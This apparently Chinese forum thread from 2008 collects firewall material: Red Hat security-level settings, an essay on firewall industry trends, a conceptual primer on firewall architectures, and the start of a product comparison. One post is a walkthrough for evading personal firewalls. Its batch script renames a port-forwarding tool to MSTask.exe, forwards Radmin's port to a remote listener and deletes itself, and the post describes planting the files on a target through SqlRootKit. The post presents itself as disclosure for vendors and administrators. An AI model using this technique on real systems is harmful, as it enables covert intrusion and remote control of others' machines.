Secure(安全)SHell(SSH)是用来在远程机器上登录及执行命令的一组工具。如果你打算使用SSH工具通过防火墙来访问你的机器,启用该选项。你需要安装openssh-server 软件包以便使用 SSH 工具来远程访问你的机器。

「Telnet」

Telnet是用来在远程机器上登录的协议。Telnet通信是不加密的,几乎没有提供任何防止来自网络刺探之类的安全措施。建议你不要允许进入的Telnet访问。如果你想允许进入的 Telnet 访问,你需要安装 telnet-server 软件包。

「WWW (HTTP)」

HTTP协议被Apache(以及其它万维网服务器)用来进行网页服务。如果你打算向公众开放你的万维网服务器,请启用该选项。你不需要启用该选项来查看本地网页或开发网页。如果你打算提供网页服务的话,你需要安装 httpd 软件包。

启用 「WWW (HTTP)」 将不会为 HTTPS 打开一个端口。要启用 HTTPS,在 「其它端口」 字段内注明。

「邮件 (SMTP)」

如果你需要允许远程主机直接连接到你的机器来发送邮件,启用该选项。如果你想从你的ISP服务器中收取POP3或IMAP邮件,或者你使用的是fetchmail之类的工具,不要启用该选项。请注意,不正确配置的 SMTP 服务器会允许远程机器使用你的服务器发送垃圾邮件。

「FTP」

FTP 协议是用于在网络机器间传输文件的协议。如果你打算使你的 FTP 服务器可被公开利用,启用该选项。你需要安装 vsftpd 软件包才能利用该选项。

「其它端口」

你可以允许到这里没有列出的其它端口的访问,方法是在 「其它端口」 字段内把它们列出。格式为: 端口:协议 。例如,如果你想允许 IMAP 通过你的防火墙,你可以指定 imap:tcp 。你还可以具体指定端口号码,要允许 UDP 包在端口 1234 通过防火墙,输入 1234:udp 。要指定多个端口,用逗号将它们隔开。

窍门:要在安装完毕后改变你的安全级别配置,使用 安全级别配置工具 。 在 shell 提示下键入 redhat-config-securitylevel 命令来启动 安全级别配置工具 。如果你不是根用户,它会提示你输入根口令后再继续。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 12 发表于: 2008-03-25 10:48:35
关注防火墙技术新动向

防火墙已经是目前最成熟的网络安全技术,也是市场上最常见的网络安全产品。在网上Google一下“防火墙”,找到2540000个匹配项;Google一下“firewall”,找到44200000个匹配项。可以想象,防火墙资料之多如汪洋大海。面对这么多的信息,想对防火墙说三道四,还真不容易。目前,网络入侵、网络攻击、网络病毒、垃圾邮件、网络陷阱,网页被篡改的新闻太多,以致于公众对“狼来了”已经麻木、没有反应了。众多的防火墙厂商,琳琅满目的防火墙产品,五花八门的防火墙新技术,充斥着网络安全界。现在网络安全产业,不是用户有什么问题,而是厂商有问题。防火墙技术已经成熟,为广大用户所认可,但是防火墙存在的问题被暴露出来,而且还很严重。用户现在是在看防火墙厂商,看他们怎么办。一位信息中心的老总在一次安全大会上叫板说,我已经买了不少防火墙,别跟我来虚的,跟我说点有新意的东西。现在不缺经费,就缺管用的东西。

  现在的防火墙技术到底有什么问题?用户到底要什么管用的东西?


  1、向下看,别老向上看
业界流行的观点是,高性能防火墙是防火墙未来发展的趋势。高性能防火墙简直就是防火墙硬件结构不用X86。而对于高端防火墙的技术实现,不外乎基于NP技术或ASIC芯片技术。NP在网络底层转发和处理数据,可二次开发,但性能比ASIC差一点。ASIC技术难度大,很难开发,但性能好一点。NP和ASIC还没有争论完,有些聪明的厂商已经找到诀窍,推出NP+ASIC的综合方案,总算找到“最佳”的搭配方案。至于工控机架构,明眼人一眼就看出了,搞NP和ASIC的人联手,就说它性能不好,说多了就让它淘汰。

  真实的情况到底是什么?用户到底是要安全还是要速度?安全和速度可是一对矛盾。在发生安全事故的时候,慢比快安全。如发生相撞事件,行人比骑自行车安全,骑自行车比开汽车安全,开汽车比坐飞机要强。不发生安全事故,当然是效率越高越好,能坐火箭当然不坐飞机。从这个意义上,如果是选择路由器,当然是速度和效率;如果是选择安全设备,要是你是安全负责人的话,选慢的,别选快的。安全总是需要时间来处理,速度越快,效率越高,安全事故发生的时候就越没救。哥仑比亚航天飞机下来的时候出了故障,连人影都找不着;飞机失事,人影还有,就是残缺不全;两个人走路相撞,生气归生气,但基本不会有事。

  这个道理用户懂,可路由器和交换机已经买了千兆的,怎么办?怎么办,买千兆防火墙!挑不挑NP或ASIC或X86,是你的事。其实,把安全问题放在千兆出口来解决,本身就不是一种理想的选择。能在计算机上解决的,不要交给网络;能在10M口上解决的,不要交给100M;能在100M口上解决的不要交给1000M;如果你还打算把安全问题交给10000M口上去解决,那基本上就是不解决。

  2、向内看,别老向外看

  来自网络外部的安全问题当然存在。黑客也罢,敌对势力也罢,外部威胁还在。但是现在90%的安全问题在内部,重点在内部,不在外部。病毒发作,往往是内部传染的。扫描,往往是内部的主机干的。要解决内部的问题,现在的防火墙架构形同虚设。一个只防外不管内的防火墙,怎么管内部的安全问题。再说,防火墙也管不着不经过防火墙的流量。

  现有的防火墙架构是一种粗颗粒度的访问控制,把整个内部网络当作一个逻辑单元来处理。这种粗颗粒度的访问控制机制不能满足高安全性的要求,不能解决内网的安全问题,因此我们需要细颗粒度的访问控制机制。细颗粒度的访问控制机制未来会很吃香。提高精度,总是好事。

  要说向内看,思科的网络访问控制(NAC)和微软的网络访问保护(NAP),都在向内看。最近注意到华为也开始向内看。无论是微软还是思科,尽管有各自的算盘,但在向内看这个问题上,倒是达成一致共识。分布式防火墙,全网安全,网格防火墙(Grid Firewall),这三样也是典型的向内看的安全架构。

  无论是思科还是其它的公司,都从去年的SARS事件中得到启发。如果网络的某个主机不安全,在没有有效办法去解决的前提下,最好的办法就是隔离。思科说,我从交换机上将其隔离。分布式防火墙说,我在每一个分布式防火墙上把这个IP和MAC给封了。总之,给隔离了。

  向内看肯定是一个趋势。细颗粒度的访问控制到底细到什么程度,目前还没有明确的说法。如果能对每一个用户,每一个IP,每一个MAC地址,都进行访问控制,可以肯定这是目前最细颗粒度的访问控制。这样的网络,是一个强制访问控制网络。听听,这个名词,强制访问控制网络(MACNET),一听就知道是安全的。如果你的网络,每一个用户都有防火墙,每一个IP都有防火墙,每一个MAC地址都有防火墙,你的内网一定相当安全。
3、来实的,别老来虚的

  防火墙给人的感觉就是没技术。要不然,怎么一下就好几百个防火墙厂商,而且每家的功能都差不多。如今非要说防火墙还有什么技术的话,对其进行DDoS攻击,看看就知道了。Linux的防火墙家家都会,但Linux上的抗DDoS攻击软件的效果不是很好。解决DDoS攻击是防火墙必须解决的问题。俗话说,养兵千日,用兵一时。敌人要打仗,你有什么办法,对抗是唯一的办法。在治理和封堵不能解决问题的情况下,对抗就是最后的办法。

  前不久看到一则消息,一家国内的厂商的抗DDoS攻击的防火墙,被国内一名技术人员研制出一种专门针对该厂商的DDoS攻击软件。该厂商很生气,对软件的作者进行了谴责。我倒觉得这不是什么坏事,该厂商也很争气,马上给出一个改进版本。这就对了,证明了自己的实力。这才叫打硬仗。那位程序人员也是了得,针对一个公司的产品给出相应的攻击工具,先不管做法对不对,对安全产业肯定会有帮助。

  别说抗DDoS该怎么做,先给出抗DDoS的防火墙再说。现在网上DDoS的攻击工具多的是,你不用,别人可没说不用,还是测一测比较放心。听说一些安全公司现在都有专门自制的DDoS测试工具,不妨向他们要一个,这也反映一个公司的技术实力。以子之矛攻子之盾,是最好的方法。用别人的矛攻子之盾,也是常见的方法。

  边界防火墙的发展趋势,现在看来,可能就是一个支持IPS功能和抗DDoS攻击的包过滤防火墙。就这点功能就够了,别的事情,边界防火墙管不好也管不了。

  4、防火墙也搞“体验式营销”

  3月25日,金山宣布抛出300万套毒霸的免费下载;3月29日,瑞星发布了下载的“瑞星杀毒软件2005网络版”;江民科技网上下载业务也全面展开,宣布免费杀毒。于是有人询问,什么时候防火墙也能搞搞“免费试用”。

  网络游戏在中国近两年得到了巨大的成功。从网络游戏中,杀毒厂商悟出了一个全新的软件发展商业模式:那就是利用网络让用户下载自己的软件,再通过网络游戏运营之道改变软件的生产、营销和消费模式。IDC公布的一份研究报告显然支持了杀毒厂商的意见,由于消费者和投资者需求的变化,历史悠久的一次性销售模式被售后不断提供升级服务支持所取代。IDC在这份研究报告中得出结论:至2010年前,大部分软件供应商的主要财务收入将来源于更新许可证而不是永久性许可证。

  尽管几乎所有的国内厂商都用的是Linux的免费防火墙,但还真没有一个向用户免费提供防火墙的厂商。如果一旦有人免费提供防火墙,还真不知道防火墙市场会变成什么样子。不过有一点可以肯定,就向IDC的报告所说的那样,用户还是需要不断提供升级和安全服务,这些服务还是要收费,可能收的一点也不少。

  不过,杀毒厂商集体跳向免费服务市场,还是让一些防火墙厂商开始动心。已经有一些厂商的老总开始向业界咨询这类问题。这往往是一个苗头。如果有一天,防火墙厂商也搞免费试用,提供服务来收取费用,对目前市场的影响有多大,只有天知道。
5、规则配置向微软学习

  要问用户对防火墙最害怕什么?用户一定说最害怕给防火墙配规则。为什么?因为规则配错了,防火墙的功能就不正确,安全出了问题,一定是用户负责。所以用户说,什么都愿意干,就是不愿意配规则。而规则恰恰是防火墙的灵魂,也是防火墙最大的难点。

  为什么说配规则是防火墙的最大难点?因为单独配一条规则很容易,配多条规则要保证其正确性却很难,因为规则与顺序有关。ABC,ACB,BCA,BAC,CAB,CBA的结果,可能相同,也可能不同,在规则很多的情况下,要检查和验证也很难。当然,如果你只配一条规则,这个问题就不存在。

  记得一位行业的用户朋友询问,有没有卖安全规则的?如果有卖安全规则的,他就愿意去买规则,这样他就不再担心规则配置错误。到现在为止,确实还没有卖安全规则的。即使一些公司提供安全服务,帮助用户配置一些规则,这同卖规则还是完全不同的两码事。

  如果有一天,防火墙厂商把安全规则与厂商的防火墙分离,安全规则可能真的成为一个独立的市场。也许那个时候,上面的朋友才能买到安全规则。这一点倒是很像医和药分离的制度,即看病和卖药是完全分开的。医生不准买药。药店不准开处方。如果是处方药,必须要得到医生的处方,药店才能卖。

  买不到规则,那位朋友还不死心,继续询问有没有验证防火墙规则配置是否正确的验证工具。朋友很失望,唠叨说,怎么不做一个这样的工具?用户都会花钱买这样的工具。

  在防火墙规则配置的问题上,防火墙厂商应该向微软公司学习。微软公司的一大优点,就是配置和使用简单,而且结果所见即所得。什么时候防火墙厂商能够像微软那样,让防火墙配置和使用简单,那一定是防火墙的发展趋势。

  6、防火墙价格向彩电学习

  防火墙市场的竞争已经白热化,没有理由不打防火墙的价格战。原来老以为打价格战就一定是低端防火墙。现在看来,高端的防火墙也开始价格战。其实价格战没有什么不好,把水份挤干净,总是让用户受益。说白了,价格战一开始,就不是成本定价,而是市场定价。Cisco推出1万元以下的防火墙。国产厂商要打赢思科,一定得推出低价的高端防火墙,才能站稳脚。只有当低价防火墙市场流行以后,安全市场才能高度国产化。

  从目前国外的市场来看,有PC上的免费个人防火墙,有收费的个人防火墙,有开放源码的免费防火墙(Linux),也有收服务费的开源防火墙。我们注意到一些国外的防火墙厂商,在美国的价格要比其在国内的价格低的多得多。这种现象显然不正常。

  最近的一些行业投标中,笔者惊喜地发现防火墙价格正在向彩电学习,这是一个好兆头。说明防火墙市场成熟了。总有人担心,价格低了没有好东西,现在的彩电价格低,东西难道没有原来好?市场这只看不见的手,管用的很。价廉物美,市场才成熟。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 13 发表于: 2008-03-25 10:49:05
防火墙的来历及应用现状

防火墙技术现状

  自从1986年美国Digital公司在Internet上安装了全球第一个商用防火墙系统后,提出了防火墙的概念,防火墙技术得到了飞速的发展。第二代防火墙,也称代理服务器,它用来提供网络服务级的控制,起到外部网络向被保护的内部网络申请服务时中间转接作用,这种方法可以有效地防止对内部网络的直接攻击,安全性较高。第三代防火墙有效地提高了防火墙的安全性,称为状态监控功能防火墙,它可以对每一层的数据包进行检测和监控。随着网络攻击手段和信息安全技术的发展,新一代的功能更强大、安全性更强的防火墙已经问世,这个阶段的防火墙已超出了原来传统意义上防火墙的范畴,已经演变成一个全方位的安全技术集成系统,我们称之为第四代防火墙,它可以抵御目前常见的网络攻击手段,如IP地址欺骗、特洛伊木马攻击、Internet蠕虫、口令探寻攻击、邮件攻击等等。

  防火墙的定义和描述

  “防火墙”这个术语参考来自应用在建筑结构里的安全技术。在楼宇里用来起分隔作用的墙,用来隔离不同的公司或房间,尽可能的起防火作用。一旦某个单元起火这种方法保护了其它的居住者。然而,多数防火墙里都有一个重要的门,允许人们进入或离开大楼。因此,虽然防火墙保护了人们的安全,但这个门在提供增强安全性的同时允许必要的访问。

  在计算机网络中,一个网络防火墙扮演着防备潜在的恶意的活动的屏障,并可通过一个”门”来允许人们在你的安全网络和开放的不安全的网络之间通信。原来,一个防火墙是由一个单独的机器组成的,放置在你的私有网络和公网之间。近些年来,防火墙机制已发展到不仅仅是”firlwall box”,更多提及到的是堡垒主机。它现在涉及到整个从内部网络到外部网络的区域,由一系列复杂的机器和程序组成。简单来说,今天防火墙的主要概念就是多个组件的应用。到现在你要准备实施你的防火墙,需要知道你的公司需要什么样的服务并且什么样的服务对于内部用户和外部用户都是有效的。

  防火墙的任务

  防火墙在实施安全的过程中是至关重要的。一个防火墙策略要符合四个目标,而每个目标通常都不是通过一个单独的设备或软件来实现的。大多数情况下防火墙的组件放在一起使用以满足公司安全目的的需求。防火墙要能确保满足以下四个目标

  实现一个公司的安全策略

  防火墙的主要意图是强制执行你的安全策略。在前面的课程提到过在适当的网络安全中安全策略的重要性。举个例子,也许你的安全策略只需对MAIL服务器的SMTP流量作些限制,那么你要直接在防火墙强制这些策略。

  创建一个阻塞点

  防火墙在一个公司私有网络和分网问建立一个检查点。这种实现要求所有的流量都要通过这个检查点。一旦这些检查点清楚地建立,防火墙设备就可以监视,过滤和检查所有进来和出去的流量。网络安全产业称这些检查点为阻塞点。通过强制所有进出流量都通过这些检查点,网络管理员可以集中在较少的方来实现安全目的。如果没有这样一个供监视和控制信息的点,系统或安全管理员则要在大量的地方来进行监测。检查点的另一个名字叫做网络边界。

  记录Internet活动

  防火墙还能够强制日志记录,并且提供警报功能。通过在防火墙上实现日志服务,安全管理员可以监视所有从外部网或互联网的访问。好的日志策略是实现适当网络安全的有效工具之一。防火墙对于管理员进行日志存档提供了更多的信息。

  限制网络暴露

  防火墙在你的网络周围创建了一个保护的边界。并且对于公网隐藏了你内部系统的一些信息以增加保密性。当远程节点侦测你的网络时,他们仅仅能看到防火墙。远程设备将不会知道你内部网络的布局以及都有些什么。防火墙提高认证功能和对网络加密来限制网络信息的暴露。通过对所能进来的流量时行源检查,以限制从外部发动的攻击。
  防火墙术语

  在我们继续讨论防火墙技术前,我们需要对一些重要的术语有一些认识

  网关

  网关是在两上设备之间提供转发服务的系统。网关的范围可以从互联网应用程序如公共网关接口(CGI)到在两台主机间处理流量的防火墙网关。这个术语是非常常见的,而且在本课会用于一个防火墙组件里,在两个不同的网络路由和处理数据。

  电路级网关

  电路级网关用来监控受信任的客户或服务器与不受信任的主机间的TCP握手信息,这样来决定该会话是否合法,电路级网关是在OSI模型中会话层上来过滤数据包,这样比包过滤防火墙要高两层。另外,电路级网关还提供一个重要的安全功能:网络地址转移(NAT)将所有公司内部的IP地址映射到一个“安全”的IP地址,这个地址是由防火墙使用的。有两种方法来实现这种类型的网关,一种是由一台主机充当筛选路由器而另一台充当应用级防火墙。另一种是在第一个防火墙主机和第二个之间建立安全的连接。这种结构的好处是当一次攻击发生时能提供容错功能。

  应用级网关

  应用级网关可以工作在OSI七层模型的任一层上,能够检查进出的数据包,通过网关复制传递数据,防止在受信任服务器和客户机与不受信任的主机间直接建立联系。应用级网关能够理解应用层上的协议,能够做复杂一些的访问控制,并做精细的注册。通常是在特殊的服务器上安装软件来实现的。

  包过滤

  包过滤是处理网络上基于packet-by-packet流量的设备。包过滤设备允许或阻止包,典型的实施方法是通过标准的路由器。包过滤是几种不同防火墙的类型之一,在本课后面我们将做详细地讨论。

  代理服务器

  代理服务器代表内部客户端与外部的服务器通信。代理服务器这个术语通常是指一个应用级的网关,虽然电路级网关也可作为代理服务器的一种。

  网络地址翻译(NAT)

  网络地址解释是对Internet隐藏内部地址,防止内部地址公开。这一功能可以克服IP寻址方式的诸多限制,完善内部寻址模式。把未注册IP地址映射成合法地址,就可以对Internet进行访问。对于NAT的另一个名字是IP地址隐藏。RFC1918概述了地址并且IANA建议使用内部地址机制,以下地址作为保留地址:

  10.0.0.0 - 10.255.255.255

  172.16.0.0 - 172.31.255.255

  192.168.0.0 - 192.168.255.255

  如果你选择上述例表中的网络地址,不需要向任何互联网授权机构注册即可使用。使用这些网络地址的一个好处就是在互联网上永远不会被路由。互联网上所有的路由器发现源或目标地址含有这些私有网络ID时都会自动地丢弃。

堡垒主机

  堡垒主机是一种被强化的可以防御进攻的计算机,被暴露于因特网之上,作为进入内部网络的一个检查点,以达到把整个网络的安全问题集中在某个主机上解决,从而省时省力,不用考虑其它主机的安全的目的。从堡垒主机的定义我们可以看到,堡垒主机是网络中最容易受到侵害的主机。所以堡垒主机也必须是自身保护最完善的主机。你可以使用单宿主堡垒主机。多数情况下,一个堡垒主机使用两块网卡,每个网卡连接不同的网络。一块网卡连接你公司的内部网络用来管理、控制和保护,而另一块连接另一个网络,通常是公网也就是Internet。堡垒主机经常配置网关服务。网关服务是一个进程来提供对从公网到私有网络的特殊协议路由,反之亦然。在一个应用级的网关里,你想使用的每一个应用程协议都需要一个进程。因此,你想通过一台堡垒主机来路由Email,Web和FTP服务时,你必须为每一个服务都提供一个守护进程。

  强化操作系统

  防火墙要求尽可能只配置必需的少量的服务。为了加强操作系统的稳固性,防火墙安装程序要禁止或删除所有不需要的服务。多数的防火墙产品,包括Axent Raptor(www.axent.com),CheckPoint(www.checkpoint.com)和Network Associates Gauntlet (www.networkassociates.com)都可以在目前较流行的操作系统上运行。如Axent Raptor防火墙就可以安装在Windows NT Server4.0,Solaris及HP-UX操作系统上。理论上来讲,让操作系统只提供最基本的功能,可以使利用系统BUG来攻击的方法非常困难。最后,当你加强你的系统时,还要考虑到除了TCP/IP协议外不要把任何协议绑定到你的外部网卡上。

  非军事化区域(DMZ)

  DMZ是一个小型网络存在于公司的内部网络和外部网络之间。这个网络由筛选路由器建立,有时是一个阻塞路由器。DMZ用来作为一个额外的缓冲区以进一步隔离公网和你的内部私有网络。DMZ另一个名字叫做Service Network,因为它非常方便。这种实施的缺点在于存在于DMZ区域的任何服务器都不会得到防火墙的完全保护。

  筛选路由器

  筛选路由器的另一个术语就是包过滤路由器并且至少有一个接口是连向公网的,如Internet。它是对进出内部网络的所有信息进行分析,并按照一定的安全策略——信息过滤规则对进出内部网络的信息进行限制,允许授权信息通过,拒绝非授权信息通过。信息过滤规则是以其所收到的数据包头信息为基础的。采用这种技术的防火墙优点在于速度快、实现方便,但安全性能差,且由于不同操作系统环境下TCP和UDP端口号所代表的应用服务协议类型有所不同,故兼容性差。

  阻塞路由器

  阻塞路由器(也叫内部路由器)保护内部的网络使之免受Internet和周边网的侵犯。内部路由器为用户的防火墙执行大部分的数据包过滤工作。它允许从内部网络到Internet的有选择的出站服务。这些服务是用户的站点能使用数据包过滤而不是代理服务安全支持和安全提供的服务。内部路由器所允许的在堡垒主机(在周边网上)和用户的内部网之间服务可以不同于内部路由器所允许的在Internet和用户的内部网之间的服务。限制堡垒主机和内部网之间服务的理由是减少由此而导致的受到来自堡垒主机侵袭的机器的数量。

  防火墙默认的配置

  默认情况下,防火墙可以配置成以下两种情况:

  ·拒绝所有的流量,这需要在你的网络中特殊指定能够进入和出去的流量的一些类型。

  ·允许所有的流量,这种情况需要你特殊指定要拒绝的流量的类型。

  可论证地,大多数防火墙默认都是拒绝所有的流量作为安全选项。一旦你安装防火墙后,你需要打开一些必要的端口来使防火墙内的用户在通过验证之后可以访问系统。换句话说,如果你想让你的员工们能够发送和接收Email,你必须在防火墙上设置相应的规则或开启允许POP3和SMTP的进程。
  防火墙的一些高级特性

  今天多数的防火墙系统组合包过滤,电路级网关和应用级网关的功能。它们检查单独的数据包或整个信息包,然后利用事先订制的规则来强制安全策略。只有那些可接受的数据包才能进出整个网络。当你实施一个防火墙策略时,这三种防火墙类型可能都需要。更高级的防火墙提供额外的功能可以增强你的网络的安全性。尽管不是必需,每个防火墙都应该实施日志记录,哪怕是一些最基本的。

  认 证

  防火墙是一个合理的放置提供认证方法来避开特定的IP包。你可以要求一个防火墙令牌(firewall token),或反向查询一个IP地址。反向查询可以检查用户是否真正地来自它所报告的源位置。这种技术有效地反击IP欺骗的攻击。防火墙还允许终端用户认证。应用级网关或代理服务器可以工作在TCP/IP四层的每一层上。多数的代理服务器提供完整的用户帐号数据库。结合使用这些用户帐号数据库和代理服务器自定义的选项来进行认证。代理服务器还可以利用这些帐号数据库来提供更详细的日志。

  日志和警报

  包过滤或筛选路由器一般在默认情况下为了不降低性能是不进行日志记录的。永远不要认为你的防火墙会自动地对所有活动创建日志。筛选路由器只能记录一些最基本的信息,而电路级网关也只能记录相同的信息但除此之外还包括任何NAT解释信息。因为你要在防火墙上创建一个阻塞点,潜在的黑客必须要先穿过它。如果你放置全面记录日志的设备并在防火墙本身实现这种技术,那么你有可能捕获到所有用户的活动包括那些黑客。你可以确切地知道黑客在做些什么并得到这些活动信息代审计。一些防火墙允许你预先配置对不期望的活动做何响应。防火墙两种最普通的活动是中断TCP/IP连接或自动发出警告。相关的警报机制包括可见的和可听到的警告。

  建立一个防火墙

  在准备和建立一个防火墙设备时要高度重视。以前,堡垒主机这个术语是指所有直接连入公网的设备。现在,它经常汲及到的是防火墙设备。堡垒主机可以是三种防火墙中的任一种类型:包过滤,电路级网关,应用级网关。

  当建设你的堡垒主机时要特别小心。堡垒主机的定义就是可公共访问的设备。当Internet用户企图访问你网络上的资源时,首先进入的机器就是堡垒主机。因为堡垒主机是直接连接到Internet上的,其上面的所有信息都暴露在公网之上。这种高度地暴露规定了硬件和软件的配置。堡垒主机就好像是在军事基地上的警卫一样。警卫必须检查每个人的身份来确定他们是否可以进入基地及可以访问基地中的什么地方。警卫还经常准备好强制阻止进入。同样地,堡垒主机必须检查所有进入的流量并强制执行在安全策略里所指定的规则。它们还必须准备好对付从外部来的攻击和可能来自内部的资源。堡垒主机还有日志记录及警报的特性来阻止攻击。有时检测到一个威胁时也会采取行动。

  设计规则

  当构造防火墙设备时,经常要遵循下面两个主要的概念。第一,保持设计的简单性。第二,要计划好一旦防火墙被渗透应该怎么办。

  保持设计的简单性

  一个黑客渗透系统最常见的方法就是利用安装在堡垒主机上不注意的组件。建立你的堡垒主机时要尽可能使用较小的组件,无论硬件还是软件。堡垒主机的建立只需提供防火墙功能。在防火墙主机上不要安装像WEB服务的应用程序服务。要删除堡垒主机上所有不必需的服务或守护进程。在堡垒主机上运行少量的服务给潜在的黑客很少的机会穿过防火墙。

  安排事故计划

  如果你已设计好你的防火墙性能,只有通过你的防火墙才能允许公共访问你的网络。当设计防火墙时安全管理员要对防火墙主机崩溃或危及的情况作出计划。如果你仅仅是用一个防火墙设备把内部网络和公网隔离开,那么黑客渗透进你的防火墙后就会对你内部的网络有着完全访问的权限。为了防止这种渗透,要设计几种不同级别的防火墙设备。不要依赖一个单独的防火墙保护惟独的网络。如果你的安全受到损害,那你的安全策略要确定该做些什么。采取一些特殊的步骤,包括

  · 创建同样的软件备份

  · 配置同样的系统并存储到安全的地方

  · 确保所有需要安装到防火墙上的软件都容易,这包括你要有恢复磁盘。

  堡垒主机的类型

  当创建堡垒主机时,要记住它是在防火墙策略中起作用的。识别堡垒主机的任务可以帮助你决定需要什么和如何配置这些设备。下面将讨论三种常见的堡垒主机类型。这些类型不是单独存在的,且多数防火墙都属于这三类中的一种。
单宿主堡垒主机

  单宿主堡垒主机是有一块网卡的防火墙设备。单宿主堡垒主机通常是用于应用级网关防火墙。外部路由器配置把所有进来的数据发送到堡垒主机上,并且所有内部客户端配置成所有出去的数据都发送到这台堡垒主机上。然后堡垒主机以安全方针作为依据检验这些数据。这种类型的防火墙主要的缺点就是可以重配置路由器使信息直接进入内部网络,而完全绕过堡垒主机。还有,用户可以重新配置他们的机器绕过堡垒主机把信息直接发送到路由器上。

  双宿主堡垒主机

  双宿主堡垒主机结构是围绕着至少具有两块网卡的双宿主主机而构成的。双宿主主机内外的网络均可与双宿主主机实施通信,但内外网络之间不可直接通信,内外部网络之间的数据流被双宿主主机完全切断。双宿主主机可以通过代理或让用户直接注册到其上来提供很高程度的网络控制。它采用主机取代路由器执行安全控制功能,故类似于包过滤防火墙。双宿主机即一台配有多个网络接口的主机,它可以用来在内部网络和外部网络之间进行寻址。当一个黑客想要访问你内部设备时,他(她)必须先要攻破双宿主堡垒主机,这有希望让你有足够的时间阻止这种安全侵入和作出反应。

  单目的堡垒主机

  单目的堡垒主机既可是单堡垒也可是多堡垒主机。经常,根据公司的改变,需要新的应用程序和技术。很多时候这些新的技术不能被测试并成为主要的安全突破口。你要为这些需要创建特定的堡垒主机。在上面安装未测试过的应用程序和服务不要危及到你的防火墙设备。使用单目的堡垒主机允许你强制执行更严格的安全机制。举个例子,你的公司可能决定实施一个新类型的流程序,假设公司的安全策略需要所有进出的流量都要通过一个代理服务器送出,你要为这个表的流程序单独地创建一个新代理服务器。在这个新的代理服务器上,你要实施用户认证和拒绝IP地址。使用这个单独的代理服务器,不要危害到当前的安全配置并且你可以实施更严格的安全机制如认证。

  内部堡垒主机

  内部堡垒主机是标准的单堡垒或多堡垒主机存在于公司的内部网络中。它们一般用作应用级网关接收所有从外部堡垒主机进来的流量。当外部防火墙设备受到损害时提供额外的安全级别。所有内部网络设备都要配置成通过内部堡垒主机通信,这样当外部堡垒主机受到损害时不会造成影响。

  四种常见的防火墙设计都提供一个确定的安全级别,一个简单的规则是越敏感的数据就要采取越广泛的防火墙策略,这四种防火墙的实施都是建立一个过滤的距阵和能够执行和保护信息的点。这四种选择是:

  ·筛选路由器

  ·单宿主堡垒主机

  ·双宿主堡垒主机

  ·屏蔽子网

  筛选路由器的选择是最简单的,因此也是最常见的,大多数公司至少使用一个筛选路由器作为解决方案,因为所有需要的硬件已经投入使用。用于创建筛选主机防火墙的两个选择是单宿主堡垒主机和双宿主堡垒主机。不管是电路级还是应用级网关的配置都要求所有的流量通过堡垒主机。最后一个常用的方法是筛选子网防火墙,利用额外的包过滤路由器来达到另一个安全的级别。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 14 发表于: 2008-03-25 10:49:29
通杀国内一些防火墙技巧

一直以来都有一个梦想:偶要是能发现些漏洞或BUG什么的该多好啊!于是整天对着电脑瞎弄瞎研究,研究什么呢?研究如何突破防火墙(偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件。)嘿嘿,你还别说,还真没白研究,还真给偶发现了大多数防火墙的通病。这个BUG能让我们欺骗防火墙来达到访外的目的,具体情况是怎么样的呢?请看下面的解说!
首先,我要介绍一下Windows系统特性,当一个程序运行时,它不能删除,但却能够改名!而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原!我再讲讲防火墙,大家都知道许多防火墙的“应用程序规则”里一般默认就会让IE浏览器(iexplore.exe)、Outlook Express(msimn.exe)、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通过,而大多的防火墙认为只要是与规则里的路径及文件名相同就Pass!以这样的检测方法来决定是否放行,但它却完全没考虑到如果是别的文件替换的呢?——就相当于古装片里的易容术,易容后就认不得了!这就给了我们机会,我们可以利用这个BUG来欺骗防火墙来达到访外的目的!
小知识:其实现在大多木马采用的DLL插线程技术也就是利用了这个原理,它们首先隐蔽的开启一个认证放行的程序进程(如Iexplore.exe进程),接着把DLL型木马插入这个线程内,然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。
原理讲完了,我们现在讲讲该如何利用这个BUG了!这里我用虚拟机做实验,制造如下条件:
为了更符合现实,我给服务器安装了“天网防火墙”、Radmin(但由于防火墙指定了访问IP地址,所以没办法正常连接!),MSSQL SERVER、Serv-u。首先我们用常用的方法进行端口转发,看看防火墙有什么反应!
第一步,启用AngelShell Ver 1.0里的Fport(用来进行端口转发的服务端,几乎可以转发任何端口),然后在本地用FportClient(用来进行端口转发的客户端)监听好!
第二步,直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”,这时我们看到虚拟机里的“天网”对Fport马上进行了拦截。?

看到了吧!由于Fport并不是认证放行的,防火墙马上就进行了拦截!OK,现在我们实行欺骗计划,看偶如何突破防火墙的!还是执行第一步,然后新建一个批处理,内容如下:
ren MSTask.exe MSTask1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del %0
命名为go.bat,接着用SqlRootKit把“Fport.exe”和go.bat 一起copy到目标机子的c:\winnt\system32\(也就是MSTask所在的目录)在SqlRootKit里执行go.bat(注意如果要改MSTask.exe的名的话就需要有管理员权限)。
当FportClient出现“已经接受到远程计算机的连接!”时,用Radmin客户端连接本机的4899端口。

我们已经成功突破限制(由于防火墙没有限制本地连接4899端口,我们用Fport转发了它的端口,登录时等于本地连接,因此我们能够成功连接),这样一来,我们本不能逃过防火墙的Fport便变成了一个有“插线程”技术的端口转发工具了!
据我实验,国内的防火墙几乎无一例外的“拥有”这个BUG!虽然这个BUG不会带来什么大的危害,但总是给入侵者多了一个黑我们的机会!
WTF老大说独乐乐不如众乐乐,所以我还是公布出来了,一是可以让我们国内的防火墙有所改进,二是给网管们提个醒!由于小弟技术有限,难免会出现错误,欢迎各位指正批评。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 15 发表于: 2008-03-25 10:49:51
一篇关于防火墙的冲突的文章

近来试用了比较流行的几个防火墙,在使用过程中进行了一些比较,记下了些文字,希望对一些不知道该如何选择的提供一些参考。同时希望交流,共同提高。
只是比较之用,没有广告之意。使用全在各有所爱。

一.Kaspersky(卡巴斯基)防火墙(Kaspersky Anti-Hacker)
1.设置简单,和Kaspersky(卡巴斯基)杀毒软件一起使用没有冲突,与ZoneAlarm Pro version:5.5.094.000运行也可以,没见死机。
